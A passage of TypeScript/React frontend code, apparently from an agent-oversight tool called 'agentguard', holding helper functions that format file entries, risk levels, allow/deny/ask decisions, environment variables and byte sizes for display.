          <p>{String(event.command || event.reason || event.detail || event.id || "")}</p>
        </div>
      ))}
    </div>
  );
}

function normalizeFileEntry(entry: Record<string, unknown>): FileEntry {
  const type = entry.type === "dir" || entry.type === "directory" ? "directory" : "file";
  return {
    name: String(entry.name || entry.path || ""),
    path: String(entry.path || entry.name || ""),
    type,
    size: typeof entry.size === "number" ? entry.size : undefined,
    restricted: Boolean(entry.restricted),
    restrictedReason:
      typeof entry.restrictedReason === "string" ? entry.restrictedReason : undefined,
  };
}

function riskClass(risk: unknown): string {
  const key = String(risk || "low").toLowerCase();
  if (key === "critical") return "risk-critical";
  if (key === "high") return "risk-high";
  if (key === "medium") return "risk-medium";
  if (key === "low") return "risk-low";
  return "muted";
}

function decisionClass(decision: unknown): string {
  const key = String(decision || "allow").toLowerCase();
  if (key === "deny") return "status-blocked";
  if (key === "ask") return "status-needs-review";
  return "status-passed";
}

function splitArgs(value: string): string[] {
  return value
    .split(/\s+/)
    .map((item) => item.trim())
    .filter(Boolean);
}

function parseEnv(value: string): Record<string, string> {
  const env: Record<string, string> = {};
  for (const line of value.split("\n")) {
    const trimmed = line.trim();
    if (!trimmed || !trimmed.includes("=")) continue;
    const [key, ...rest] = trimmed.split("=");
    env[key.trim()] = rest.join("=").trim();
  }
  return env;
}

function readSavedRoot(): { projectId: string | null; rootPath: string; name?: string } | null {
  try {
    const raw = localStorage.getItem("agentguard-react-file-root") || "";
    return raw ? JSON.parse(raw) : null;
  } catch {
    return null;
  }
}

function writeSavedRoot(root: { projectId: string | null; rootPath: string; name?: string }) {
  try {
    localStorage.setItem("agentguard-react-file-root", JSON.stringify(root));
  } catch {
    // localStorage can be unavailable in hardened webviews.
  }
}

function formatBytes(n: number): string {
  if (!Number.isFinite(n)) return "?";
  if (n < 1024) return `${n} B`;
  if (n < 1024 * 1024) return `${(n / 1024).toFixed(1)} KB`;
  return `${(n / 1024 / 1024).toFixed(1)} MB`;
}

function formatValue(value: unknown): string {
  if (Array.isArray(value)) return value.map((item) => formatValue(item)).join(", ");
  if (value && typeof value === "object") {
    const maybeTitle =
      (value as Record<string, unknown>).title ||
      (value as Record<string, unknown>).name ||
      (value as Record<string, unknown>).summary;
    return maybeTitle ? String(maybeTitle) : JSON.stringify(value);
  }
  return String(value ?? "");
}
